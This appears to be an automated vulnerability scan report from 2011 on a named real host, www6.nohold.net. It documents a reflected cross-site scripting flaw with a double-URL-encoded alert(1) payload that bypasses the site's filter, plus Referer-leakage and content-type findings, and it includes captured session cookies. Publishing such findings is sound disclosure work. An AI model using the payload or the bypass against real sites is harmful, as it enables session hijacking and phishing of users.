XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, www6.nohold.net

Report generated by XSS.CX at Wed Sep 28 09:56:30 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

XSS in www6.nohold.net, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

2. Cross-domain Referer leakage

2.1. http://www6.nohold.net/CiscoFlip/GetArticle.aspx

2.2. http://www6.nohold.net/CiscoFlip/ukp.aspx

3. Content type incorrectly stated



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www6.nohold.net
Path:   /CiscoFlip/GetArticle.aspx

Issue detail

The value of the docid request parameter is copied into the HTML document as plain text between tags. The payload d33f3%253cscript%253ealert%25281%2529%253c%252fscript%253e1f924a2fb46 was submitted in the docid parameter. This input was echoed as d33f3<script>alert(1)</script>1f924a2fb46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the docid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /CiscoFlip/GetArticle.aspx?docid=d33f3%253cscript%253ealert%25281%2529%253c%252fscript%253e1f924a2fb46&pid=2&converted=0 HTTP/1.1
Host: www6.nohold.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www6.nohold.net/CiscoFlip/ukp.aspx?pid=2&app=vw&vw=1&login=1&docid=28c5b54b39954752a980acd61d9ea891_KB_EN_v1.xml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PROWKOSnhkpweb3CKQOQ; ASP.NET_SessionId=diyqem21umogzp451gtnco2f; k43login2=1; k43rid2=75435503806637070

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 375
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 28 Sep 2011 14:39:18 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Error Page
...[SNIP]...
<h4>Restricted Access Denied:d33f3<script>alert(1)</script>1f924a2fb46</h4>
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://www6.nohold.net/CiscoFlip/GetArticle.aspx  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www6.nohold.net
Path:   /CiscoFlip/GetArticle.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CiscoFlip/GetArticle.aspx?docid=28c5b54b39954752a980acd61d9ea891_KB_EN_v1.xml&pid=2&converted=0 HTTP/1.1
Host: www6.nohold.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www6.nohold.net/CiscoFlip/ukp.aspx?pid=2&app=vw&vw=1&login=1&docid=28c5b54b39954752a980acd61d9ea891_KB_EN_v1.xml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PROWKOSnhkpweb3CKQOQ; ASP.NET_SessionId=diyqem21umogzp451gtnco2f; k43login2=1; k43rid2=75435503806637070

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3303
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 28 Sep 2011 14:39:13 GMT

<?xml version="1.0" encoding="utf-8"?>
<html>
<head xmlns:fo="http://www.w3.org/1999/XSL/Format" xmlns:HTML="http://www.w3.org/Profiles/XHTML-transitional">
<meta http-equiv="content-type" co
...[SNIP]...
<p><img height="79" width="105" alt="" src="http://50.56.41.45/CiscoFlip/Images/kb1387-001_en_v1.png" /></p>
...[SNIP]...
<p style="text-align: center;"><img height="260" width="800" alt="" src="http://50.56.41.45/CiscoFlip/Images/kb1387-002_en_v1.png" /></p>
...[SNIP]...
<p>Cisco will also continue to provide technical support for both Flip video cameras and FlipShare until December 31, 2013.&#160; To learn more about the future of Flip, click <a target="_blank" href="http://www.theflip.com/en-us/futureofflip.aspx">here</a>.</p>
<p><em>For more information on the warranty of your device, click <a target="_blank" href="http://support.theflip.com/assets/flip/downloads/others/Warranty.pdf">here</a>
...[SNIP]...

2.2. http://www6.nohold.net/CiscoFlip/ukp.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www6.nohold.net
Path:   /CiscoFlip/ukp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CiscoFlip/ukp.aspx?pid=2&app=vw&vw=1&login=1&docid=28c5b54b39954752a980acd61d9ea891_KB_EN_v1.xml HTTP/1.1
Host: www6.nohold.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://support.theflip.com/en-us/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7914
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 28 Sep 2011 14:38:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fo="http://www.w3.org/1999/XSL/Format">
<head>
<META http
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://50.56.41.45/CiscoFlip/Portals/Portal2/Images/flip-layout-v2.css"><script src="Shared/nh_yui-min.js?v=29" type="text/javascript">
...[SNIP]...
<a href="#" onclick="ajaxSubmitVoteform(); return false;" title="Submit"><img src="http://50.56.41.45/CiscoFlip/Portals/Portal2/Images/btnSubmitsm.gif" border="0" align="middle" /></a>
...[SNIP]...

3. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www6.nohold.net
Path:   /CiscoFlip/GetArticle.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /CiscoFlip/GetArticle.aspx?docid=28c5b54b39954752a980acd61d9ea891_KB_EN_v1.xml&pid=2&converted=0 HTTP/1.1
Host: www6.nohold.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www6.nohold.net/CiscoFlip/ukp.aspx?pid=2&app=vw&vw=1&login=1&docid=28c5b54b39954752a980acd61d9ea891_KB_EN_v1.xml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PROWKOSnhkpweb3CKQOQ; ASP.NET_SessionId=diyqem21umogzp451gtnco2f; k43login2=1; k43rid2=75435503806637070

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3303
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 28 Sep 2011 14:39:13 GMT

<?xml version="1.0" encoding="utf-8"?>
<html>
<head xmlns:fo="http://www.w3.org/1999/XSL/Format" xmlns:HTML="http://www.w3.org/Profiles/XHTML-transitional">
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css">
...[SNIP]...

Report generated by XSS.CX at Wed Sep 28 09:56:30 CDT 2011.